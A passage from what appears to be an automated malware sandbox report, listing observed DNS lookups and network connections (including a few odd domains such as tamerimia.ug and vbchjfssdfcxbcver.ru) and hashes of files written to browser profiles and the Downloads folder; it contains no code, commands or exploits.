| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| GB | 142.250.178.14:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| GB | 108.138.217.119:443 | platform-api.sharethis.com | tcp |
| FR | 157.240.196.15:443 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| IE | 54.247.106.76:443 | l.sharethis.com | tcp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| GB | 18.245.143.111:443 | buttons-config.sharethis.com | tcp |
| US | 8.8.8.8:53 | d2znr2yi078d75.cloudfront.net | udp |
| US | 8.8.8.8:53 | httplogserver-lb.global.unified-prod.sharethis.net | udp |
| US | 8.8.8.8:53 | d2znr2yi078d75.cloudfront.net | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 172.217.169.14:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| GB | 163.70.147.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.196.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.106.247.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 8.8.8.8:53 | api.majorgeeks.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| GB | 172.217.169.14:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 18.154.84.47:443 | count-server.sharethis.com | tcp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 142.250.200.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 142.250.178.14:443 | cse.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| GB | 172.217.169.3:443 | recaptcha.net | udp |
| GB | 172.217.169.3:443 | recaptcha.net | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | www.babylon-software.com | udp |
| US | 174.138.88.129:443 | www.babylon-software.com | tcp |
| US | 174.138.88.129:443 | www.babylon-software.com | tcp |
| US | 8.8.8.8:53 | www-new.babylon-software.com | udp |
| US | 8.8.8.8:53 | www-new.babylon-software.com | udp |
| US | 8.8.8.8:53 | 129.88.138.174.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge.marker.io | udp |
| US | 104.26.15.104:443 | edge.marker.io | tcp |
| US | 8.8.8.8:53 | edge.marker.io | udp |
| US | 8.8.8.8:53 | edge.marker.io | udp |
| US | 104.26.15.104:443 | edge.marker.io | udp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 192.0.77.48:443 | s.w.org | tcp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 8.8.8.8:53 | s.w.org | udp |
| US | 192.0.77.48:443 | s.w.org | udp |
| US | 8.8.8.8:53 | 104.15.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.77.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | api.marker.io | udp |
| US | 104.26.15.104:443 | api.marker.io | tcp |
| US | 104.26.15.104:443 | api.marker.io | tcp |
| US | 8.8.8.8:53 | api.marker.io | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | api.marker.io | udp |
| US | 104.26.15.104:443 | api.marker.io | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 174.138.88.129:443 | www-new.babylon-software.com | tcp |
| US | 104.26.15.104:443 | api.marker.io | tcp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 174.138.88.129:443 | www-new.babylon-software.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | vbchjfssdfcxbcver.ru | udp |
| US | 8.8.8.8:53 | tamerimia.ug | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\df65ba51-df15-4520-941b-55e9bb0ab139
| MD5 | b9ff4c87be64b11b47552d5035978080 |
| SHA1 | cf3447a9b78b85b189e44fff030d42623b877ca0 |
| SHA256 | 9b7645fc700ab764733a03c0e456cb09eda5bc30107b1ed0e509cb41c0d50540 |
| SHA512 | 6d2abf06cb051bdb49b2d67a3264c3113d288230620e9e0075472b7eeb2d4bb6cc5c71fad16b0499d7b9653f7b0a3ec6fdc96549e7380da2f27014fdfbee8fcd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\eee020e1-7033-45ef-bd22-e70ddb3a872c
| MD5 | 291fd186113f9f622145c8b5e386f1de |
| SHA1 | 66a66123161f3891480d6d277cec2972b7dd634c |
| SHA256 | bdcca3c4e2f6a7ee8b463def177b4500e1af037fd1cd2047d5015468121bf4bb |
| SHA512 | f63f14be4b710d89ec3026a300c2bcb11c56e6bbc549cd9bf835854772fdfeb1c851619c4e351cd2e57fe778fe4abd49935b7ef6214903613b1c965d418c2c67 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\a1fc0069-04d9-4dd5-b110-c309ca5ef2ad
| MD5 | 451ed0e9a4b2826234f97c7185b8845c |
| SHA1 | 51a4fab3197743da29a5cfdc0cbdce26764606db |
| SHA256 | 1fa2972a87f8dca9bc86476012273d2f2097c7c7216c46308c31f90ec37eed17 |
| SHA512 | 3acd9beeffad8bd6270a79097af13748163d6b3c8bf240a71f49f9ddbcb2c6029ea013730156916ce349901c5af49eab53231b595b0afe29c02e067ba589c85e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | a377b2442c2b5c6b61b693756ccf202f |
| SHA1 | 84266e9be32a18bdf15b2714e53e6a0cb81786cc |
| SHA256 | 3353a4445d80260cee88c597bcb9293c30fce05844008cdc7c6d3a648afa1a4f |
| SHA512 | b17a8cffffe94371f08226cd30b6643f91d91eb7817cc67ccd8e0480efa620aa6cbf5acaccb29d0bf070afc94a98c8047346ebf54d16b97866488cbe84eb5742 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\activity-stream.discovery_stream.json
| MD5 | e536fa9a42b131ea81433cbc4815336c |
| SHA1 | 8d34ce0ea45c45fc771c3fca72561daf7e5be819 |
| SHA256 | c078be69b84168252fc338fd68f12657ae83d6803d7b2ec2b2b75756af890bf0 |
| SHA512 | 4db4182ee5df7170c6abf1b166820f7110030ac2ae44a0f032bdfc99d78e33139c4b8ca717037c4ae56ce44c7382c72e7e341d93aa932ddb6ff575dcb89c3eed |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin
| MD5 | e984a3942006668bc68c80f0a237894a |
| SHA1 | ada9be2068388b20e975c83ee94ab0b871b86923 |
| SHA256 | 77931414749c8051415f52fa4fb274ea04504524c6d6b667460207cfdb5aee77 |
| SHA512 | cade2d1acbff19c028d5c418b8162d74c217131d18d7497a0ecafd0d3c10a1855066f2ca79d295facf9c2b4b92596cab0b1a8d9c816b6334690b944e3da47382 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs.js
| MD5 | 98ffafba01fe7d7cf6d27a533c5dcb1e |
| SHA1 | ab1d39188c19b5901d0fbaaef62ee02c71875e0e |
| SHA256 | a8d546d5690159104666bd451a37771f43f78e9ebc3abdd94f7cde172f667915 |
| SHA512 | c5431f10343a1e828bfd3ea2d02efde9dfc49068dd478b28afa2a1a89c836acd2a7429fdb62b6f7351172a70ce2cfbb54ef11cb2b896e42053e1b776c42e5001 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\22BC66147DE4D9CCB3F524F6E89AC26C10296C33
| MD5 | 6886b9a288b8f2b4fdc74e4969534b7c |
| SHA1 | 2cd9e64e1884b49f22270d69bfc55bd72636ef2b |
| SHA256 | 555cdb4d963a4e4268dd44ac3d0b66a64233115a504fdff58c9c19e639349269 |
| SHA512 | 1e55a15a928570693c62482312f5f34b7ce8488de3ad15e3da6c5182e34e9cd616f5387d4919daa5002d193d8e9d25544962c9a57c4ce6129e71397cb6e89528 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\EC8927C51600DCFB101869E2BC0169F040E712BF
| MD5 | 5d603afcd4c92c4c64810e643c06dbe0 |
| SHA1 | aa6883dff22369294b13bc9e09ca96a8f8fae49e |
| SHA256 | 78c7bde4f415489c5ee37b881e6749ba787bb44d48267a21acfc89a9914cf627 |
| SHA512 | 2fca0c077121ca2626168684c03ae3a2a937c6fc932a155ea4e6a53f920f77cb4f191854102dab533e32ef2a95ed86a8e4d3e9d7736c158540977ea1f28e8f4a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\635B48880E56C89BCB1EFACA38CA66013A086AD1
| MD5 | fe28053163de821d92ae163ee6737cf2 |
| SHA1 | 5e9697efc2efc27cd0720c8e0a7d0acd9b8583f1 |
| SHA256 | 07293dff316328ce5e900a34d01b2391d4b2860171f7eb98ca3b7ebc294e04bf |
| SHA512 | 73b82e7d8b6eeeb28fa79f8f1fed9b7957d1f292a584d665876cdde493f074c2ee0aeb64f2929534c546122a70119aa41965f903c5865694716f63aeb787003f |
C:\Users\Admin\Downloads\ProcessExplorer.wzI9Y73o.zip.part
| MD5 | 6c33b4937c5ed3f19f44cda1a9fe0bfc |
| SHA1 | 09ac5309b4d112d7cdb275572c28e3513748ad8c |
| SHA256 | 54336cd4f4608903b1f89a43ca88f65c2f209f4512a5201cebd2b38ddc855f24 |
| SHA512 | de2d46289164c77e7e5815d011164b48fe3e7394228a4ac2dd97b58a9ec68e306e7d18b18c45913fda9b80fed47607ea7600004e5fdffcda5b1362e71ad68056 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 5a7e095dad1a98870436afe583606359 |
| SHA1 | 06cea2034fad83c1ea671baa22b22e89b184cacc |
| SHA256 | 89715e857f2fc02bf4836d1dc1f070e528d91c5d72d6fbb9ca582a884aef8413 |
| SHA512 | 70fbc2774319854ff7d7a9a45dddf25f3de869d8bfd3278025033390f50f5d0fb88a9596d4f5f596f1db09e95291df2e81af8042136388d2240ba5f4dbe8df3c |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs-1.js
| MD5 | d1d62b88b65f1a5e4a5476f60ba6f86c |
| SHA1 | 2341c739b980066e226ed8a858e654765ba423f0 |
| SHA256 | a6958c0f02b3394925a5c97ef4d3b785c82209ad44cdf287c2df9a9a8a45eca6 |
| SHA512 | 963b4cde72c5ab13c614aba59f1a678c145f63f50187e2368295c60d83f549b4d1e749ad96227bb835de05ea00f2b20f6cf48670d07f95cad0eb1c700f3a5b17 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin
| MD5 | 422cb96d1c681d603069039885b23396 |
| SHA1 | f5106f445fd7aa82486a1fdd6704f70aea9921aa |
| SHA256 | 50db555da8d6235ceecb9d0cb851ec97698e36f96a9237066b55d38f08ce207d |
| SHA512 | 5619746adc70c56cd300950085bca01602d56e14584f6017ea16485e6d9523a867dea7b4fa457e2a666a722e6ac9660d6f3d2b074d847d48252d7ae57d63cb21 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 1bdbcb0637613b88bb1cd86bd077605b |
| SHA1 | 3cefbf6c10879eb35e431312552591fd6c82a331 |
| SHA256 | 149aab50a9b5aab2ca1ea981e5d74f5f362156febb6ce4dc4a807bd2a7cc8388 |
| SHA512 | f7f24267fe1077f825657709d0111de1964ed414b5a2b95ef816de8f006df15115d06689802ce9a937cea79dcad94250ea6c29fe7558ee909d43deff6ff5c142 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e765f3d75e6b0e4a7119c8b14d47d8da |
| SHA1 | cc9f7c7826c2e1a129e7d98884926076c3714fc0 |
| SHA256 | 986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89 |
| SHA512 | a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079 |
\??\pipe\LOCAL\crashpad_5452_TSRPGZESWQVWNQRF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 03ff85ec16876406d8208f5595ed8567 |
| SHA1 | 257be6e6c344e2a5ea1897f49b8d274ff68b00c5 |
| SHA256 | 228e5cafbb41bd9efb4031789953cd78370c4f2d9cce317ef79b5397354dcee7 |
| SHA512 | 35c447d4811a932f82d0a932239f5ac654279e33e8bbeaa310e026261125d654ba296a6c4afb426ae65b7ee2ae7aa2f3793acf975062570cf2fa67aed34f82f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 53bc70ecb115bdbabe67620c416fe9b3 |
| SHA1 | af66ec51a13a59639eaf54d62ff3b4f092bb2fc1 |
| SHA256 | b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771 |
| SHA512 | cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2b75d362cf5ba67e865a728e9d9e9b38 |
| SHA1 | c19e8685fcbf94941100a8b0d268085daabdeb85 |
| SHA256 | d25e4e99a74877d82f25bff1c1466f84d9d770e0d3319f0ed90889859c64f563 |
| SHA512 | fdba6428a8922db884b67a7e99f267660cf46d789dc53f38a712ecf3130600cc3d2a3465b042879c5b395a10de3481059be73519dd7a2cb04b38c76db4b07b0e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 47ad0358aa4c592a336557d313a9936d |
| SHA1 | b2da7ed27b71ccef76eff1bb128c1c0e809d0cc6 |
| SHA256 | 3fc1a207fb5f9f5bbd967c8581952dcfc8bf0a419b9c53d4b1ea962a8601fd48 |
| SHA512 | ab6ec6b2eb99cbc38e8eae1caf95a00aee743def34ecc3909b1f7ec7d7355ee70380a85493e570fd39fea2f1ed866394ea02610955d9b515110b9f9a11a2e628 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 61e7c2f0390c8320a5902f0c77d65dac |
| SHA1 | cceaf88fb4c84f87d6d3e595c204a3a254948d57 |
| SHA256 | 4875e73aa7f856eb85fd1cd5f078e954d862b5055c2cc0e06f9c820747d078c0 |
| SHA512 | 96f04e2b9aa134198722d02ce360efd1c26b4564e6aee7428df7ee4811f38a9f233a602941cb9593538469f3600a8742051586fafdf4607f1e45164e60e2acd7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 8cdc45939ad25ebb258506905a9ad21a |
| SHA1 | 34f2e22750371c2a16f9b7cf092fdfeda43bc5f4 |
| SHA256 | 5a084d072b91f7d78e666e04712538efac57c2476374a35f3be683cc9ffea15c |
| SHA512 | 3e2524d010c0e96a74ed4d9958ec19867ca784b9b077a7ac4f141dd795dd4954f4725dd87b0fdf4152bc11694814af380769a76db9b0f3b9dafb29ef067107cb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 733077d45158cd2ccc4b9e8f0279d2b0 |
| SHA1 | 1aca6f1b6c3d5ff52806be9853193d3dd001139f |
| SHA256 | dd60274bb0fb4f2f1ad4680872716e7e181099bdcfd474dc54b5515cf223cf41 |
| SHA512 | 5411a3b978d97aafb05411db864021ce356a1c37e29254277b635a985a7fa280c296e5fd6e37e78836d52d0f30b155a8b983db3bb5421c6aac45a1db4f806f3d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\doomed\8499
| MD5 | 8cbc256f3978a7dd3dba68651b71b15d |
| SHA1 | cab68e23f1edef18c74fed45a99ed55dec760578 |
| SHA256 | 76362be262b48e9f0dac5f467263d0be19e456e4c0eb4e83918e9f3632422d93 |
| SHA512 | e150525063d81739b55da10762955169840ec7f6bb3c269f9f65c58cef2761afd82ddd684e9ed4edd0238c7e861c9defd8a7f16c303ba70d418d981af21b96df |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\4BCF7D608B2663D7D1515223C0F13E5D72484770
| MD5 | 9f476c1a279b0b42a269699db33de3ba |
| SHA1 | f46f082c10072f07ac2e7e5aed341bdda7f0f758 |
| SHA256 | 4d851b70dc2a7bac241b5e5531abb628f84dcaa14e4ae93f8c1592272ce0b016 |
| SHA512 | 7651a876d92803deeeecd6d46924ec6361c409fbd5664fa77a7dc4c96f3cb0b6f675cd8dd79acd0dd4bb1924f8b9d539e9ba980432d10fe1a1481225bc6561cc |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\F5A1FBDEF4E6F115791D6C8EF1598942067B8080
| MD5 | cd7c7627d687c080a7b724b7830af0ed |
| SHA1 | 251dbba032942187c0ba4b35df251598b54e251c |
| SHA256 | 037e3a0153f28fe1c20761001c270468ce6b1157ef45c205b27c5c925a00c58d |
| SHA512 | 510f87ff45330286354a895455a79581b33706a7144630595c027b913d2e5edcf013f8a29e1743706efc2d6ca45b4c574674f570a3ed344efd35bdfdf826f30b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\AC6959268E349C7B5497A3867D6DCDC4D543431E
| MD5 | 15fae44dd046181cbce90a65ff714fe3 |
| SHA1 | 18213d230a5036177ccfaa268da7d2aff618a809 |
